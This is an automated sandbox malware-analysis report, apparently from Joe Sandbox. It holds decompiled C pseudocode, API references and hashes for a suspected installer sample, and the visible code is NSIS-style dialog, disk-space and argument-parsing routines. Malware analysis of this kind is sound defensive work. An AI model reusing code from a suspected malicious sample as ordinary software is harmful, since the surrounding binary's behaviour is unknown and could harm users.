                                                                                                                          									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                                                          									asm("cdq");
                                                                                                                          									_v48 = _t109;
                                                                                                                          									_v44 = _t156;
                                                                                                                          									_v12 = 1;
                                                                                                                          									goto L36;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								_t159 = 0;
                                                                                                                          								if(0 == 0x421718) {
                                                                                                                          									goto L30;
                                                                                                                          								} else {
                                                                                                                          									goto L26;
                                                                                                                          								}
                                                                                                                          								while(1) {
                                                                                                                          									L26:
                                                                                                                          									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                                                                                                                          									if(_t114 != 0) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									if(_t159 != 0) {
                                                                                                                          										 *_t159 =  *_t159 & _t114;
                                                                                                                          									}
                                                                                                                          									_t160 = E00405F83(0x421718);
                                                                                                                          									 *_t160 =  *_t160 & 0x00000000;
                                                                                                                          									_t159 = _t160;
                                                                                                                          									 *_t159 = 0x5c;
                                                                                                                          									if(_t159 != 0x421718) {
                                                                                                                          										continue;
                                                                                                                          									} else {
                                                                                                                          										goto L30;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								_t150 = _v44;
                                                                                                                          								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                                                          								_v44 = _t150 >> 0xa;
                                                                                                                          								_v12 = 1;
                                                                                                                          								_t158 = 0;
                                                                                                                          								__eflags = 0;
                                                                                                                          								L35:
                                                                                                                          								_t169 = 0x400;
                                                                                                                          								L36:
                                                                                                                          								_t95 = E00404F52(5);
                                                                                                                          								if(_v12 != _t158) {
                                                                                                                          									_t197 = _v44;
                                                                                                                          									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                                                          										_v8 = 2;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                                                                                                                          									E00404F3A(0x3ff, 0xfffffffb, _t95);
                                                                                                                          									if(_v12 == _t158) {
                                                                                                                          										SetDlgItemTextW(_a4, _t169, 0x421708);
                                                                                                                          									} else {
                                                                                                                          										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								_t96 = _v8;
                                                                                                                          								 *0x42a304 = _t96;
                                                                                                                          								if(_t96 == _t158) {
                                                                                                                          									_v8 = E0040140B(7);
                                                                                                                          								}
                                                                                                                          								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                                                                          									_v8 = _t158;
                                                                                                                          								}
                                                                                                                          								E004045E6(0 | _v8 == _t158);
                                                                                                                          								if(_v8 == _t158 &&  *0x423738 == _t158) {
                                                                                                                          									E00404A0E();
                                                                                                                          								}
                                                                                                                          								 *0x423738 = _t158;
                                                                                                                          								goto L53;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t186 = _a8 - 0x405;
                                                                                                                          						if(_a8 != 0x405) {
                                                                                                                          							goto L53;
                                                                                                                          						}
                                                                                                                          						goto L22;
                                                                                                                          					}
                                                                                                                          					_t118 = _a12 & 0x0000ffff;
                                                                                                                          					if(_t118 != 0x3fb) {
                                                                                                                          						L12:
                                                                                                                          						if(_t118 == 0x3e9) {
                                                                                                                          							_t152 = 7;
                                                                                                                          							memset( &_v76, 0, _t152 << 2);
                                                                                                                          							_v80 = _t167;
                                                                                                                          							_v72 = 0x423748;
                                                                                                                          							_v60 = E00404E0B;
                                                                                                                          							_v56 = _t146;
                                                                                                                          							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                                                                                                                          							_t122 =  &_v80;
                                                                                                                          							_v64 = 0x41;
                                                                                                                          							__imp__SHBrowseForFolderW(_t122);
                                                                                                                          							if(_t122 == 0) {
                                                                                                                          								_a8 = 0x40f;
                                                                                                                          							} else {
                                                                                                                          								__imp__CoTaskMemFree(_t122);
                                                                                                                          								E00405F37(_t146);
                                                                                                                          								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                                                                                                                          								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Psychopharmacology") {
                                                                                                                          									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                                                                                                                          									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                                                                                                                          										lstrcatW(_t146, 0x428200);
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								 *0x423738 =  *0x423738 + 1;
                                                                                                                          								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L20;
                                                                                                                          					}
                                                                                                                          					if(_a12 >> 0x10 != 0x300) {
                                                                                                                          						goto L53;
                                                                                                                          					}
                                                                                                                          					_a8 = 0x40f;
                                                                                                                          					goto L12;
                                                                                                                          				} else {
                                                                                                                          					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                                                                          					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                                                                                                                          						E00405F37(_t146);
                                                                                                                          					}
                                                                                                                          					 *0x429238 = _t167;
                                                                                                                          					SetWindowTextW(_t166, _t146);
                                                                                                                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                                          					_push(1);
                                                                                                                          					E004045C4(_t167);
                                                                                                                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                          					_push(0x14);
                                                                                                                          					E004045C4(_t167);
                                                                                                                          					E004045F9(_t166);
                                                                                                                          					_t138 = E00406A35(8);
                                                                                                                          					if(_t138 == 0) {
                                                                                                                          						L53:
                                                                                                                          						return E0040462B(_a8, _a12, _a16);
                                                                                                                          					} else {
                                                                                                                          						 *_t138(_t166, 1);
                                                                                                                          						goto L8;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}













































                                                                                                                          0x00404ab5
                                                                                                                          0x00404abb
                                                                                                                          0x00404ac1
                                                                                                                          0x00404ac5
                                                                                                                          0x00404ac8
                                                                                                                          0x00404ace
                                                                                                                          0x00404adc
                                                                                                                          0x00404adf
                                                                                                                          0x00404ae7
                                                                                                                          0x00404aed
                                                                                                                          0x00404aed
                                                                                                                          0x00404af9
                                                                                                                          0x00404afc
                                                                                                                          0x00404b6a
                                                                                                                          0x00404b71
                                                                                                                          0x00404c48
                                                                                                                          0x00404c4f
                                                                                                                          0x00404c5e
                                                                                                                          0x00404c5e
                                                                                                                          0x00404c62
                                                                                                                          0x00404c6c
                                                                                                                          0x00404c79
                                                                                                                          0x00404c7b
                                                                                                                          0x00404c7b
                                                                                                                          0x00404c89
                                                                                                                          0x00404c90
                                                                                                                          0x00404c97
                                                                                                                          0x00404c9a
                                                                                                                          0x00404cd6
                                                                                                                          0x00404cd8
                                                                                                                          0x00404cde
                                                                                                                          0x00404ce3
                                                                                                                          0x00404ce7
                                                                                                                          0x00404ce9
                                                                                                                          0x00404ce9
                                                                                                                          0x00404d05
                                                                                                                          0x00000000
                                                                                                                          0x00404d07
                                                                                                                          0x00404d0a
                                                                                                                          0x00404d18
                                                                                                                          0x00404d1e
                                                                                                                          0x00404d1f
                                                                                                                          0x00404d22
                                                                                                                          0x00404d25
                                                                                                                          0x00000000
                                                                                                                          0x00404d25
                                                                                                                          0x00404c9c
                                                                                                                          0x00404c9e
                                                                                                                          0x00404ca2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404ca4
                                                                                                                          0x00404ca4
                                                                                                                          0x00404cb1
                                                                                                                          0x00404cb6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404cba
                                                                                                                          0x00404cbc
                                                                                                                          0x00404cbc
                                                                                                                          0x00404cc5
                                                                                                                          0x00404cc7
                                                                                                                          0x00404ccc
                                                                                                                          0x00404ccf
                                                                                                                          0x00404cd4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404cd4
                                                                                                                          0x00404d31
                                                                                                                          0x00404d3b
                                                                                                                          0x00404d3e
                                                                                                                          0x00404d41
                                                                                                                          0x00404d48
                                                                                                                          0x00404d48
                                                                                                                          0x00404d4a
                                                                                                                          0x00404d4a
                                                                                                                          0x00404d4f
                                                                                                                          0x00404d51
                                                                                                                          0x00404d59
                                                                                                                          0x00404d60
                                                                                                                          0x00404d62
                                                                                                                          0x00404d6d
                                                                                                                          0x00404d6d
                                                                                                                          0x00404d62
                                                                                                                          0x00404d7d
                                                                                                                          0x00404d87
                                                                                                                          0x00404d8f
                                                                                                                          0x00404daa
                                                                                                                          0x00404d91
                                                                                                                          0x00404d9a
                                                                                                                          0x00404d9a
                                                                                                                          0x00404d8f
                                                                                                                          0x00404daf
                                                                                                                          0x00404db4
                                                                                                                          0x00404db9
                                                                                                                          0x00404dc2
                                                                                                                          0x00404dc2
                                                                                                                          0x00404dcb
                                                                                                                          0x00404dcd
                                                                                                                          0x00404dcd
                                                                                                                          0x00404dd9
                                                                                                                          0x00404de1
                                                                                                                          0x00404deb
                                                                                                                          0x00404deb
                                                                                                                          0x00404df0
                                                                                                                          0x00000000
                                                                                                                          0x00404df0
                                                                                                                          0x00404c9a
                                                                                                                          0x00404c51
                                                                                                                          0x00404c58
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404c58
                                                                                                                          0x00404b77
                                                                                                                          0x00404b80
                                                                                                                          0x00404b9a
                                                                                                                          0x00404b9f
                                                                                                                          0x00404ba9
                                                                                                                          0x00404bb0
                                                                                                                          0x00404bbc
                                                                                                                          0x00404bbf
                                                                                                                          0x00404bc2
                                                                                                                          0x00404bc9
                                                                                                                          0x00404bd1
                                                                                                                          0x00404bd4
                                                                                                                          0x00404bd8
                                                                                                                          0x00404bdf
                                                                                                                          0x00404be7
                                                                                                                          0x00404c41
                                                                                                                          0x00404be9
                                                                                                                          0x00404bea
                                                                                                                          0x00404bf1
                                                                                                                          0x00404bfb
                                                                                                                          0x00404c03
                                                                                                                          0x00404c10
                                                                                                                          0x00404c24
                                                                                                                          0x00404c28
                                                                                                                          0x00404c28
                                                                                                                          0x00404c24
                                                                                                                          0x00404c2d
                                                                                                                          0x00404c3a
                                                                                                                          0x00404c3a
                                                                                                                          0x00404be7
                                                                                                                          0x00000000
                                                                                                                          0x00404b9f
                                                                                                                          0x00404b8d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404b93
                                                                                                                          0x00000000
                                                                                                                          0x00404afe
                                                                                                                          0x00404b0b
                                                                                                                          0x00404b14
                                                                                                                          0x00404b21
                                                                                                                          0x00404b21
                                                                                                                          0x00404b28
                                                                                                                          0x00404b2e
                                                                                                                          0x00404b37
                                                                                                                          0x00404b3a
                                                                                                                          0x00404b3d
                                                                                                                          0x00404b45
                                                                                                                          0x00404b48
                                                                                                                          0x00404b4b
                                                                                                                          0x00404b51
                                                                                                                          0x00404b58
                                                                                                                          0x00404b5f
                                                                                                                          0x00404df6
                                                                                                                          0x00404e08
                                                                                                                          0x00404b65
                                                                                                                          0x00404b68
                                                                                                                          0x00000000
                                                                                                                          0x00404b68
                                                                                                                          0x00404b5f

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404B04
                                                                                                                          • SetWindowTextW.USER32(00000000,-0042B000), ref: 00404B2E
                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                                                                          • lstrcmpiW.KERNEL32(Call,00423748,00000000,?,-0042B000), ref: 00404C1C
                                                                                                                          • lstrcatW.KERNEL32(-0042B000,Call), ref: 00404C28
                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,-0042B000), ref: 00404C3A
                                                                                                                            • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                                                                                            • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75AA3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                                                            • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                                                            • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,75AA3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                                                            • Part of subcall function 004068EF: CharPrevW.USER32(?,?,75AA3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,-0042B000,00000001,00421718,-0042B000,-0042B000,000003FB,-0042B000), ref: 00404CFD
                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                                                                            • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-0042B000), ref: 00404F12
                                                                                                                            • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                                                                            • Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Psychopharmacology$Call$H7B
                                                                                                                          • API String ID: 2624150263-803638731
                                                                                                                          • Opcode ID: 667bbe0a30595837a03e9c6ce466c2f6c83f7bc5ead90454ae6c6de6e9a81711
                                                                                                                          • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                                                                          • Opcode Fuzzy Hash: 667bbe0a30595837a03e9c6ce466c2f6c83f7bc5ead90454ae6c6de6e9a81711
                                                                                                                          • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E71461BFF() {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				WCHAR* _v24;
                                                                                                                          				WCHAR* _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				WCHAR* _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				void* _v56;
                                                                                                                          				intOrPtr _v60;
                                                                                                                          				WCHAR* _t208;
                                                                                                                          				signed int _t211;
                                                                                                                          				void* _t213;
                                                                                                                          				void* _t215;
                                                                                                                          				WCHAR* _t217;
                                                                                                                          				void* _t225;
                                                                                                                          				struct HINSTANCE__* _t226;
                                                                                                                          				struct HINSTANCE__* _t227;
                                                                                                                          				struct HINSTANCE__* _t229;
                                                                                                                          				signed short _t231;
                                                                                                                          				struct HINSTANCE__* _t234;
                                                                                                                          				struct HINSTANCE__* _t236;
                                                                                                                          				void* _t237;
                                                                                                                          				intOrPtr* _t238;
                                                                                                                          				void* _t249;
                                                                                                                          				signed char _t250;
                                                                                                                          				signed int _t251;
                                                                                                                          				struct HINSTANCE__* _t257;
                                                                                                                          				void* _t258;
                                                                                                                          				signed int _t260;
                                                                                                                          				signed int _t261;
                                                                                                                          				signed short* _t264;
                                                                                                                          				signed int _t269;
                                                                                                                          				signed int _t272;
                                                                                                                          				signed int _t274;
                                                                                                                          				void* _t277;
                                                                                                                          				void* _t281;
                                                                                                                          				struct HINSTANCE__* _t283;
                                                                                                                          				signed int _t286;
                                                                                                                          				void _t287;
                                                                                                                          				signed int _t288;
                                                                                                                          				signed int _t300;
                                                                                                                          				signed int _t301;
                                                                                                                          				signed short _t304;
                                                                                                                          				void* _t305;
                                                                                                                          				signed int _t309;
                                                                                                                          				signed int _t312;
                                                                                                                          				signed int _t315;
                                                                                                                          				signed int _t316;
                                                                                                                          				signed int _t317;
                                                                                                                          				signed short* _t321;
                                                                                                                          				WCHAR* _t322;
                                                                                                                          				WCHAR* _t324;
                                                                                                                          				WCHAR* _t325;
                                                                                                                          				struct HINSTANCE__* _t326;
                                                                                                                          				void* _t328;
                                                                                                                          				signed int _t331;
                                                                                                                          				void* _t332;
                                                                                                                          
                                                                                                                          				_t283 = 0;
                                                                                                                          				_v32 = 0;
                                                                                                                          				_v36 = 0;
                                                                                                                          				_v16 = 0;
                                                                                                                          				_v8 = 0;
                                                                                                                          				_v40 = 0;
                                                                                                                          				_t332 = 0;
                                                                                                                          				_v52 = 0;
                                                                                                                          				_v44 = 0;
                                                                                                                          				_t208 = E714612BB();
                                                                                                                          				_v24 = _t208;
                                                                                                                          				_v28 = _t208;
                                                                                                                          				_v48 = E714612BB();
                                                                                                                          				_t321 = E714612E3();
                                                                                                                          				_v56 = _t321;
                                                                                                                          				_v12 = _t321;
                                                                                                                          				while(1) {
                                                                                                                          					_t211 = _v32;
                                                                                                                          					_v60 = _t211;
                                                                                                                          					if(_t211 != _t283 && _t332 == _t283) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_t286 =  *_t321 & 0x0000ffff;
                                                                                                                          					_t213 = _t286 - _t283;
                                                                                                                          					if(_t213 == 0) {
                                                                                                                          						_t37 =  &_v32;
                                                                                                                          						 *_t37 = _v32 | 0xffffffff;
                                                                                                                          						__eflags =  *_t37;
                                                                                                                          						L20:
                                                                                                                          						_t215 = _v60 - _t283;
                                                                                                                          						if(_t215 == 0) {
                                                                                                                          							__eflags = _t332 - _t283;
                                                                                                                          							 *_v28 = _t283;
                                                                                                                          							if(_t332 == _t283) {
                                                                                                                          								_t332 = GlobalAlloc(0x40, 0x1ca4);
                                                                                                                          								 *(_t332 + 0x1010) = _t283;
                                                                                                                          								 *(_t332 + 0x1014) = _t283;
                                                                                                                          							}
                                                                                                                          							_t287 = _v36;
                                                                                                                          							_t47 = _t332 + 8; // 0x8
                                                                                                                          							_t217 = _t47;
                                                                                                                          							_t48 = _t332 + 0x808; // 0x808
                                                                                                                          							_t322 = _t48;
                                                                                                                          							 *_t332 = _t287;
                                                                                                                          							_t288 = _t287 - _t283;
                                                                                                                          							__eflags = _t288;
                                                                                                                          							 *_t217 = _t283;
                                                                                                                          							 *_t322 = _t283;
                                                                                                                          							 *(_t332 + 0x1008) = _t283;
                                                                                                                          							 *(_t332 + 0x100c) = _t283;
                                                                                                                          							 *(_t332 + 4) = _t283;
                                                                                                                          							if(_t288 == 0) {
                                                                                                                          								__eflags = _v28 - _v24;
                                                                                                                          								if(_v28 == _v24) {
                                                                                                                          									goto L42;
                                                                                                                          								}
                                                                                                                          								_t328 = 0;
                                                                                                                          								GlobalFree(_t332);
                                                                                                                          								_t332 = E714613B1(_v24);
                                                                                                                          								__eflags = _t332 - _t283;
                                                                                                                          								if(_t332 == _t283) {
                                                                                                                          									goto L42;
                                                                                                                          								} else {
                                                                                                                          									goto L35;
                                                                                                                          								}
                                                                                                                          								while(1) {
                                                                                                                          									L35:
                                                                                                                          									_t249 =  *(_t332 + 0x1ca0);
                                                                                                                          									__eflags = _t249 - _t283;
                                                                                                                          									if(_t249 == _t283) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									_t328 = _t332;
                                                                                                                          									_t332 = _t249;
                                                                                                                          									__eflags = _t332 - _t283;
                                                                                                                          									if(_t332 != _t283) {
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								__eflags = _t328 - _t283;
                                                                                                                          								if(_t328 != _t283) {
                                                                                                                          									 *(_t328 + 0x1ca0) = _t283;
                                                                                                                          								}
                                                                                                                          								_t250 =  *(_t332 + 0x1010);
                                                                                                                          								__eflags = _t250 & 0x00000008;
                                                                                                                          								if((_t250 & 0x00000008) == 0) {
                                                                                                                          									_t251 = _t250 | 0x00000002;
                                                                                                                          									__eflags = _t251;
                                                                                                                          									 *(_t332 + 0x1010) = _t251;
                                                                                                                          								} else {
                                                                                                                          									_t332 = E7146162F(_t332);
                                                                                                                          									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                                                                                          								}
                                                                                                                          								goto L42;
                                                                                                                          							} else {
                                                                                                                          								_t300 = _t288 - 1;
                                                                                                                          								__eflags = _t300;
                                                                                                                          								if(_t300 == 0) {
                                                                                                                          									L31:
                                                                                                                          									lstrcpyW(_t217, _v48);
                                                                                                                          									L32:
                                                                                                                          									lstrcpyW(_t322, _v24);
                                                                                                                          									goto L42;
                                                                                                                          								}
                                                                                                                          								_t301 = _t300 - 1;
                                                                                                                          								__eflags = _t301;
                                                                                                                          								if(_t301 == 0) {
                                                                                                                          									goto L32;
                                                                                                                          								}
                                                                                                                          								__eflags = _t301 != 1;
                                                                                                                          								if(_t301 != 1) {
                                                                                                                          									goto L42;
                                                                                                                          								}
                                                                                                                          								goto L31;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							if(_t215 == 1) {
                                                                                                                          								_t257 = _v16;
                                                                                                                          								if(_v40 == _t283) {
                                                                                                                          									_t257 = _t257 - 1;
                                                                                                                          								}
                                                                                                                          								 *(_t332 + 0x1014) = _t257;
                                                                                                                          							}
                                                                                                                          							L42:
                                                                                                                          							_v12 = _v12 + 2;
                                                                                                                          							_v28 = _v24;
                                                                                                                          							L59:
                                                                                                                          							if(_v32 != 0xffffffff) {
                                                                                                                          								_t321 = _v12;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t258 = _t213 - 0x23;
                                                                                                                          					if(_t258 == 0) {
                                                                                                                          						__eflags = _t321 - _v56;
                                                                                                                          						if(_t321 <= _v56) {
                                                                                                                          							L17:
                                                                                                                          							__eflags = _v44 - _t283;
                                                                                                                          							if(_v44 != _t283) {
                                                                                                                          								L43:
                                                                                                                          								_t260 = _v32 - _t283;
                                                                                                                          								__eflags = _t260;
                                                                                                                          								if(_t260 == 0) {
                                                                                                                          									_t261 = _t286;
                                                                                                                          									while(1) {
                                                                                                                          										__eflags = _t261 - 0x22;
                                                                                                                          										if(_t261 != 0x22) {
                                                                                                                          											break;
                                                                                                                          										}
                                                                                                                          										_t321 =  &(_t321[1]);
                                                                                                                          										__eflags = _v44 - _t283;
                                                                                                                          										_v12 = _t321;
                                                                                                                          										if(_v44 == _t283) {
                                                                                                                          											_v44 = 1;
                                                                                                                          											L162:
                                                                                                                          											_v28 =  &(_v28[0]);
                                                                                                                          											 *_v28 =  *_t321;
                                                                                                                          											L58:
                                                                                                                          											_t331 =  &(_t321[1]);
                                                                                                                          											__eflags = _t331;
                                                                                                                          											_v12 = _t331;
                                                                                                                          											goto L59;
                                                                                                                          										}
                                                                                                                          										_t261 =  *_t321 & 0x0000ffff;
                                                                                                                          										_v44 = _t283;
                                                                                                                          									}
                                                                                                                          									__eflags = _t261 - 0x2a;
                                                                                                                          									if(_t261 == 0x2a) {
                                                                                                                          										_v36 = 2;
                                                                                                                          										L57:
                                                                                                                          										_t321 = _v12;
                                                                                                                          										_v28 = _v24;
                                                                                                                          										_t283 = 0;
                                                                                                                          										__eflags = 0;
                                                                                                                          										goto L58;
                                                                                                                          									}
                                                                                                                          									__eflags = _t261 - 0x2d;
                                                                                                                          									if(_t261 == 0x2d) {
                                                                                                                          										L151:
                                                                                                                          										_t304 =  *_t321;
                                                                                                                          										__eflags = _t304 - 0x2d;
                                                                                                                          										if(_t304 != 0x2d) {
                                                                                                                          											L154:
                                                                                                                          											_t264 =  &(_t321[1]);
                                                                                                                          											__eflags =  *_t264 - 0x3a;
                                                                                                                          											if( *_t264 != 0x3a) {
                                                                                                                          												goto L162;
                                                                                                                          											}
                                                                                                                          											__eflags = _t304 - 0x2d;
                                                                                                                          											if(_t304 == 0x2d) {
                                                                                                                          												goto L162;
                                                                                                                          											}
                                                                                                                          											_v36 = 1;
                                                                                                                          											L157:
                                                                                                                          											_v12 = _t264;
                                                                                                                          											__eflags = _v28 - _v24;
                                                                                                                          											if(_v28 <= _v24) {
                                                                                                                          												 *_v48 = _t283;
                                                                                                                          											} else {
                                                                                                                          												 *_v28 = _t283;
                                                                                                                          												lstrcpyW(_v48, _v24);
                                                                                                                          											}
                                                                                                                          											goto L57;
                                                                                                                          										}
                                                                                                                          										_t264 =  &(_t321[1]);
                                                                                                                          										__eflags =  *_t264 - 0x3e;
                                                                                                                          										if( *_t264 != 0x3e) {
                                                                                                                          											goto L154;
                                                                                                                          										}
                                                                                                                          										_v36 = 3;
                                                                                                                          										goto L157;
                                                                                                                          									}
                                                                                                                          									__eflags = _t261 - 0x3a;
                                                                                                                          									if(_t261 != 0x3a) {
                                                                                                                          										goto L162;
                                                                                                                          									}
                                                                                                                          									goto L151;
                                                                                                                          								}
                                                                                                                          								_t269 = _t260 - 1;
                                                                                                                          								__eflags = _t269;
                                                                                                                          								if(_t269 == 0) {
                                                                                                                          									L80:
                                                                                                                          									_t305 = _t286 + 0xffffffde;
                                                                                                                          									__eflags = _t305 - 0x55;
                                                                                                                          									if(_t305 > 0x55) {
                                                                                                                          										goto L57;
                                                                                                                          									}
                                                                                                                          									switch( *((intOrPtr*)(( *(_t305 + 0x714623e8) & 0x000000ff) * 4 +  &M7146235C))) {
                                                                                                                          										case 0:
                                                                                                                          											__ecx = _v24;
                                                                                                                          											__edi = _v12;
                                                                                                                          											while(1) {
                                                                                                                          												__edi = __edi + 1;
                                                                                                                          												__edi = __edi + 1;
                                                                                                                          												_v12 = __edi;
                                                                                                                          												__ax =  *__edi;
                                                                                                                          												__eflags = __ax - __dx;
                                                                                                                          												if(__ax != __dx) {
                                                                                                                          													goto L132;
                                                                                                                          												}
                                                                                                                          												L131:
                                                                                                                          												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                                                                          												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                                                                          													L136:
                                                                                                                          													 *__ecx =  *__ecx & 0x00000000;
                                                                                                                          													__eax = E714612CC(_v24);
                                                                                                                          													__ebx = __eax;
                                                                                                                          													goto L97;
                                                                                                                          												}
                                                                                                                          												L132:
                                                                                                                          												__eflags = __ax;
                                                                                                                          												if(__ax == 0) {
                                                                                                                          													goto L136;
                                                                                                                          												}
                                                                                                                          												__eflags = __ax - __dx;
                                                                                                                          												if(__ax == __dx) {
                                                                                                                          													__edi = __edi + 1;
                                                                                                                          													__edi = __edi + 1;
                                                                                                                          													__eflags = __edi;
                                                                                                                          												}
                                                                                                                          												__ax =  *__edi;
                                                                                                                          												 *__ecx =  *__edi;
                                                                                                                          												__ecx = __ecx + 1;
                                                                                                                          												__ecx = __ecx + 1;
                                                                                                                          												__edi = __edi + 1;
                                                                                                                          												__edi = __edi + 1;
                                                                                                                          												_v12 = __edi;
                                                                                                                          												__ax =  *__edi;
                                                                                                                          												__eflags = __ax - __dx;
                                                                                                                          												if(__ax != __dx) {
                                                                                                                          													goto L132;
                                                                                                                          												}
                                                                                                                          												goto L131;
                                                                                                                          											}
                                                                                                                          										case 1:
                                                                                                                          											_v8 = 1;
                                                                                                                          											goto L57;
                                                                                                                          										case 2:
                                                                                                                          											_v8 = _v8 | 0xffffffff;
                                                                                                                          											goto L57;
                                                                                                                          										case 3:
                                                                                                                          											_v8 = _v8 & 0x00000000;
                                                                                                                          											_v20 = _v20 & 0x00000000;
                                                                                                                          											_v16 = _v16 + 1;
                                                                                                                          											goto L85;
                                                                                                                          										case 4:
                                                                                                                          											__eflags = _v20;
                                                                                                                          											if(_v20 != 0) {
                                                                                                                          												goto L57;
                                                                                                                          											}
                                                                                                                          											_v12 = _v12 - 2;
                                                                                                                          											__ebx = E714612BB();
                                                                                                                          											 &_v12 = E71461B86( &_v12);
                                                                                                                          											__eax = E71461510(__edx, __eax, __edx, __ebx);
                                                                                                                          											goto L97;
                                                                                                                          										case 5:
                                                                                                                          											L105:
